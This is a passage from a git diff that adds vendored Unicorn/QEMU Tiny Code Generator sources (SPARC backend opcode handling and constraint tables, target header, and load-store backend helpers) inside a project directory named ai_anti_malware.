INDEX_op_ext32u_i64: + tcg_out_arithi(s, a0, a1, 0, SHIFT_SRL); + break; + case INDEX_op_trunc_shr_i32: + if (a2 == 0) { + tcg_out_mov(s, TCG_TYPE_I32, a0, a1); + } else { + tcg_out_arithi(s, a0, a1, a2, SHIFT_SRLX); + } + break; + + case INDEX_op_brcond_i64: + tcg_out_brcond_i64(s, a2, a0, a1, const_args[1], args[3]); + break; + case INDEX_op_setcond_i64: + tcg_out_setcond_i64(s, args[3], a0, a1, a2, c2); + break; + case INDEX_op_movcond_i64: + tcg_out_movcond_i64(s, args[5], a0, a1, a2, c2, args[3], const_args[3]); + break; + case INDEX_op_add2_i64: + tcg_out_addsub2_i64(s, args[0], args[1], args[2], args[3], args[4], + const_args[4], args[5], const_args[5], false); + break; + case INDEX_op_sub2_i64: + tcg_out_addsub2_i64(s, args[0], args[1], args[2], args[3], args[4], + const_args[4], args[5], const_args[5], true); + break; + case INDEX_op_muluh_i64: + tcg_out_arith(s, args[0], args[1], args[2], ARITH_UMULXHI); + break; + + gen_arith: + tcg_out_arithc(s, a0, a1, a2, c2, c); + break; + + gen_arith1: + tcg_out_arithc(s, a0, TCG_REG_G0, a1, const_args[1], c); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef sparc_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "rZ", "r" } }, + { INDEX_op_st16_i32, { "rZ", "r" } }, + { INDEX_op_st_i32, { "rZ", "r" } }, + + { INDEX_op_add_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_mul_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_div_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_divu_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_sub_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_and_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_andc_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_or_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_orc_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_xor_i32, { "r", "rZ", "rJ" } }, + + { INDEX_op_shl_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_shr_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_sar_i32, { "r", "rZ", "rJ" } }, + + { INDEX_op_neg_i32, { "r", "rJ" } }, + { INDEX_op_not_i32, { "r", "rJ" } }, + + { INDEX_op_brcond_i32, { "rZ", "rJ" } }, + { INDEX_op_setcond_i32, { "r", "rZ", "rJ" } }, + { INDEX_op_movcond_i32, { "r", "rZ", "rJ", "rI", "0" } }, + + { INDEX_op_add2_i32, { "r", "r", "rZ", "rZ", "rJ", "rJ" } }, + { INDEX_op_sub2_i32, { "r", "r", "rZ", "rZ", "rJ", "rJ" } }, + { INDEX_op_mulu2_i32, { "r", "r", "rZ", "rJ" } }, + { INDEX_op_muls2_i32, { "r", "r", "rZ", "rJ" } }, + + { INDEX_op_ld8u_i64, { "R", "r" } }, + { INDEX_op_ld8s_i64, { "R", "r" } }, + { INDEX_op_ld16u_i64, { "R", "r" } }, + { INDEX_op_ld16s_i64, { "R", "r" } }, + { INDEX_op_ld32u_i64, { "R", "r" } }, + { INDEX_op_ld32s_i64, { "R", "r" } }, + { INDEX_op_ld_i64, { "R", "r" } }, + { INDEX_op_st8_i64, { "RZ", "r" } }, + { INDEX_op_st16_i64, { "RZ", "r" } }, + { INDEX_op_st32_i64, { "RZ", "r" } }, + { INDEX_op_st_i64, { "RZ", "r" } }, + + { INDEX_op_add_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_mul_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_div_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_divu_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_sub_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_and_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_andc_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_or_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_orc_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_xor_i64, { "R", "RZ", "RJ" } }, + + { INDEX_op_shl_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_shr_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_sar_i64, { "R", "RZ", "RJ" } }, + + { INDEX_op_neg_i64, { "R", "RJ" } }, + { INDEX_op_not_i64, { "R", "RJ" } }, + + { INDEX_op_ext32s_i64, { "R", "r" } }, + { INDEX_op_ext32u_i64, { "R", "r" } }, + { INDEX_op_trunc_shr_i32, { "r", "R" } }, + + { INDEX_op_brcond_i64, { "RZ", "RJ" } }, + { INDEX_op_setcond_i64, { "R", "RZ", "RJ" } }, + { INDEX_op_movcond_i64, { "R", "RZ", "RJ", "RI", "0" } }, + + { INDEX_op_add2_i64, { "R", "R", "RZ", "RZ", "RJ", "RI" } }, + { INDEX_op_sub2_i64, { "R", "R", "RZ", "RZ", "RJ", "RI" } }, + { INDEX_op_muluh_i64, { "R", "RZ", "RZ" } }, + + { INDEX_op_qemu_ld_i32, { "r", "A" } }, + { INDEX_op_qemu_ld_i64, { "R", "A" } }, + { INDEX_op_qemu_st_i32, { "sZ", "A" } }, + { INDEX_op_qemu_st_i64, { "SZ", "A" } }, + + { -1 }, +}; + +static void tcg_target_init(TCGContext *s) +{ + /* Only probe for the platform and capabilities if we havn't already + determined maximum values at compile time. */ +#ifndef use_vis3_instructions + { + unsigned long hwcap = qemu_getauxval(AT_HWCAP); + use_vis3_instructions = (hwcap & HWCAP_SPARC_VIS3) != 0; + } +#endif + + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffffffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, ALL_64); + + tcg_regset_set32(s->tcg_target_call_clobber_regs, 0, + (1 << TCG_REG_G1) | + (1 << TCG_REG_G2) | + (1 << TCG_REG_G3) | + (1 << TCG_REG_G4) | + (1 << TCG_REG_G5) | + (1 << TCG_REG_G6) | + (1 << TCG_REG_G7) | + (1 << TCG_REG_O0) | + (1 << TCG_REG_O1) | + (1 << TCG_REG_O2) | + (1 << TCG_REG_O3) | + (1 << TCG_REG_O4) | + (1 << TCG_REG_O5) | + (1 << TCG_REG_O7)); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_G0); /* zero */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_G6); /* reserved for os */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_G7); /* thread pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_I6); /* frame pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_I7); /* return address */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_O6); /* stack pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_T1); /* for internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_T2); /* for internal use */ + + tcg_add_target_add_op_defs(s, sparc_op_defs); +} + +#if SPARC64 +# define ELF_HOST_MACHINE EM_SPARCV9 +#else +# define ELF_HOST_MACHINE EM_SPARC32PLUS +# define ELF_HOST_FLAGS EF_SPARC_32PLUS +#endif + +void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + uint32_t *ptr = (uint32_t *)jmp_addr; + uintptr_t disp = addr - jmp_addr; + + /* We can reach the entire address space for 32-bit. For 64-bit + the code_gen_buffer can't be larger than 2GB. */ + assert(disp == (int32_t)disp); + + *ptr = CALL | (uint32_t)disp >> 2; + flush_icache_range(jmp_addr, jmp_addr + 4); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.h new file mode 100644 index 0000000..b1b2265 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.h @@ -0,0 +1,167 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TCG_TARGET_SPARC +#define TCG_TARGET_SPARC 1 + +#define TCG_TARGET_REG_BITS 64 + +#define TCG_TARGET_INSN_UNIT_SIZE 4 +#define TCG_TARGET_NB_REGS 32 + +typedef enum { + TCG_REG_G0 = 0, + TCG_REG_G1, + TCG_REG_G2, + TCG_REG_G3, + TCG_REG_G4, + TCG_REG_G5, + TCG_REG_G6, + TCG_REG_G7, + TCG_REG_O0, + TCG_REG_O1, + TCG_REG_O2, + TCG_REG_O3, + TCG_REG_O4, + TCG_REG_O5, + TCG_REG_O6, + TCG_REG_O7, + TCG_REG_L0, + TCG_REG_L1, + TCG_REG_L2, + TCG_REG_L3, + TCG_REG_L4, + TCG_REG_L5, + TCG_REG_L6, + TCG_REG_L7, + TCG_REG_I0, + TCG_REG_I1, + TCG_REG_I2, + TCG_REG_I3, + TCG_REG_I4, + TCG_REG_I5, + TCG_REG_I6, + TCG_REG_I7, +} TCGReg; + +#define TCG_CT_CONST_S11 0x100 +#define TCG_CT_CONST_S13 0x200 +#define TCG_CT_CONST_ZERO 0x400 + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_O6 + +#ifdef __arch64__ +#define TCG_TARGET_STACK_BIAS 2047 +#define TCG_TARGET_STACK_ALIGN 16 +#define TCG_TARGET_CALL_STACK_OFFSET (128 + 6*8 + TCG_TARGET_STACK_BIAS) +#else +#define TCG_TARGET_STACK_BIAS 0 +#define TCG_TARGET_STACK_ALIGN 8 +#define TCG_TARGET_CALL_STACK_OFFSET (64 + 4 + 6*4) +#endif + +#ifdef __arch64__ +#define TCG_TARGET_EXTEND_ARGS 1 +#endif + +#if defined(__VIS__) && __VIS__ >= 0x300 +#define use_vis3_instructions 1 +#else +extern bool use_vis3_instructions; +#endif + +/* optional instructions */ +#define TCG_TARGET_HAS_div_i32 1 +#define TCG_TARGET_HAS_rem_i32 0 +#define TCG_TARGET_HAS_rot_i32 0 +#define TCG_TARGET_HAS_ext8s_i32 0 +#define TCG_TARGET_HAS_ext16s_i32 0 +#define TCG_TARGET_HAS_ext8u_i32 0 +#define TCG_TARGET_HAS_ext16u_i32 0 +#define TCG_TARGET_HAS_bswap16_i32 0 +#define TCG_TARGET_HAS_bswap32_i32 0 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_not_i32 1 +#define TCG_TARGET_HAS_andc_i32 1 +#define TCG_TARGET_HAS_orc_i32 1 +#define TCG_TARGET_HAS_eqv_i32 0 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_nor_i32 0 +#define TCG_TARGET_HAS_deposit_i32 0 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 1 +#define TCG_TARGET_HAS_muls2_i32 1 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_mulsh_i32 0 + +#define TCG_TARGET_HAS_trunc_shr_i32 1 +#define TCG_TARGET_HAS_div_i64 1 +#define TCG_TARGET_HAS_rem_i64 0 +#define TCG_TARGET_HAS_rot_i64 0 +#define TCG_TARGET_HAS_ext8s_i64 0 +#define TCG_TARGET_HAS_ext16s_i64 0 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 0 +#define TCG_TARGET_HAS_ext16u_i64 0 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_bswap16_i64 0 +#define TCG_TARGET_HAS_bswap32_i64 0 +#define TCG_TARGET_HAS_bswap64_i64 0 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_not_i64 1 +#define TCG_TARGET_HAS_andc_i64 1 +#define TCG_TARGET_HAS_orc_i64 1 +#define TCG_TARGET_HAS_eqv_i64 0 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 0 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 use_vis3_instructions +#define TCG_TARGET_HAS_mulsh_i64 0 + +#define TCG_AREG0 TCG_REG_I0 + +#ifdef _MSC_VER +#include +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + FlushInstructionCache(GetCurrentProcess(), (const void*)start, stop-start); +} +#else +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + uintptr_t p; + for (p = start & -8; p < ((stop + 7) & -8); p += 8) { + __asm__ __volatile__("flush\t%0" : : "r" (p)); + } +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-ldst.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-ldst.h new file mode 100644 index 0000000..429cba2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-ldst.h @@ -0,0 +1,91 @@ +/* + * TCG Backend Data: load-store optimization only. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#ifdef CONFIG_SOFTMMU +#define TCG_MAX_QEMU_LDST 640 + +typedef struct TCGLabelQemuLdst { + bool is_ld; /* qemu_ld: true, qemu_st: false */ + TCGMemOp opc; + TCGType type; /* result type of a load */ + TCGReg addrlo_reg; /* reg index for low word of guest virtual addr */ + TCGReg addrhi_reg; /* reg index for high word of guest virtual addr */ + TCGReg datalo_reg; /* reg index for low word to be loaded or stored */ + TCGReg datahi_reg; /* reg index for high word to be loaded or stored */ + int mem_index; /* soft MMU memory index */ + tcg_insn_unit *raddr; /* gen code addr of the next IR of qemu_ld/st IR */ + tcg_insn_unit *label_ptr[2]; /* label pointers to be updated */ +} TCGLabelQemuLdst; + +typedef struct TCGBackendData { + int nb_ldst_labels; + TCGLabelQemuLdst ldst_labels[TCG_MAX_QEMU_LDST]; +} TCGBackendData; + + +/* + * Initialize TB backend data at the beginning of the TB. + */ + +static inline void tcg_out_tb_init(TCGContext *s) +{ + s->be->nb_ldst_labels = 0; +} + +/* + * Generate TB finalization at the end of block + */ + +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l); +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l); + +static void tcg_out_tb_finalize(TCGContext *s) +{ + TCGLabelQemuLdst *lb = s->be->ldst_labels; + int i, n = s->be->nb_ldst_labels; + + /* qemu_ld/st slow paths */ + for (i = 0; i < n; i++) { + if (lb[i].is_ld) { + tcg_out_qemu_ld_slow_path(s, lb + i); + } else { + tcg_out_qemu_st_slow_path(s, lb + i); + } + } +} + +/* + * Allocate a new TCGLabelQemuLdst entry. + */ + +static inline TCGLabelQemuLdst *new_ldst_label(TCGContext *s) +{ + TCGBackendData *be = s->be; + int n = be->nb_ldst_labels; + + assert(n < TCG_MAX_QEMU_LDST); + be->nb_ldst_labels = n + 1; + return &be->ldst_labels[n]; +} +#else +#include "tcg-be-null.h" +#endif /* CONFIG_SOFTMMU */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-null.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-null.h new file mode 100644 index 0000000..ba2da3c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-be-null.h @@ -0,0 +1,45 @@ +/* + * TCG Backend Data: No backend data + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg.h" + +typedef struct TCGBackendData { + /* Empty */ + char dummy; +} TCGBackendData; + + +/* + * Initialize TB backend data at the beginning of the TB. + */ + +static inline void tcg_out_tb_init(TCGContext *s) +{ +} + +/* + * Generate TB finalization at the end of block + */ + +static inline void tcg_out_tb_finalize(TCGContext *s) +{ +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-op.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-op.h new file mode 100644 index 0000000..51a0631 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-op.h @@ -0,0 +1,2784 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#include "tcg.h" +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +int gen_new_label(TCGContext *); + +static inline void gen_uc_tracecode(TCGContext *tcg_ctx, int32_t size, int32_t type, void *uc, uint64_t pc) +{ + TCGv_i32 tsize = tcg_const_i32(tcg_ctx, size); + TCGv_i32 ttype = tcg_const_i32(tcg_ctx, type); + TCGv_ptr tuc = tcg_const_ptr(tcg_ctx, uc); + TCGv_i64 tpc = tcg_const_i64(tcg_ctx, pc); + gen_helper_uc_tracecode(tcg_ctx, tsize, ttype, tuc, tpc); +} + +static inline void tcg_gen_op0(TCGContext *s, TCGOpcode opc) +{ + *s->gen_opc_ptr++ = opc; +} + +static inline void tcg_gen_op1_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); +} + +static inline void tcg_gen_op1_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); +} + +static inline void tcg_gen_op1i(TCGContext *s, TCGOpcode opc, TCGArg arg1) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = arg1; +} + +static inline void tcg_gen_op2_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); +} + +static inline void tcg_gen_op2_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); +} + +static inline void tcg_gen_op2i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGArg arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = arg2; +} + +static inline void tcg_gen_op2i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGArg arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = arg2; +} + +static inline void tcg_gen_op2ii(TCGContext *s, TCGOpcode opc, TCGArg arg1, TCGArg arg2) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = arg1; + *s->gen_opparam_ptr++ = arg2; +} + +static inline void tcg_gen_op3_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); +} + +static inline void tcg_gen_op3_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); +} + +static inline void tcg_gen_op3i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, + TCGv_i32 arg2, TCGArg arg3) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = arg3; +} + +static inline void tcg_gen_op3i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, + TCGv_i64 arg2, TCGArg arg3) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = arg3; +} + +static inline void tcg_gen_ldst_op_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 val, + TCGv_ptr base, TCGArg offset) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(val); + *s->gen_opparam_ptr++ = GET_TCGV_PTR(base); + *s->gen_opparam_ptr++ = offset; +} + +static inline void tcg_gen_ldst_op_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 val, + TCGv_ptr base, TCGArg offset) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(val); + *s->gen_opparam_ptr++ = GET_TCGV_PTR(base); + *s->gen_opparam_ptr++ = offset; +} + +static inline void tcg_gen_op4_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); +} + +static inline void tcg_gen_op4_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); +} + +static inline void tcg_gen_op4i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGArg arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = arg4; +} + +static inline void tcg_gen_op4i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGArg arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = arg4; +} + +static inline void tcg_gen_op4ii_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGArg arg3, TCGArg arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = arg3; + *s->gen_opparam_ptr++ = arg4; +} + +static inline void tcg_gen_op4ii_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGArg arg3, TCGArg arg4) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = arg3; + *s->gen_opparam_ptr++ = arg4; +} + +static inline void tcg_gen_op5_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4, TCGv_i32 arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg5); +} + +static inline void tcg_gen_op5_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4, TCGv_i64 arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg5); +} + +static inline void tcg_gen_op5i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, 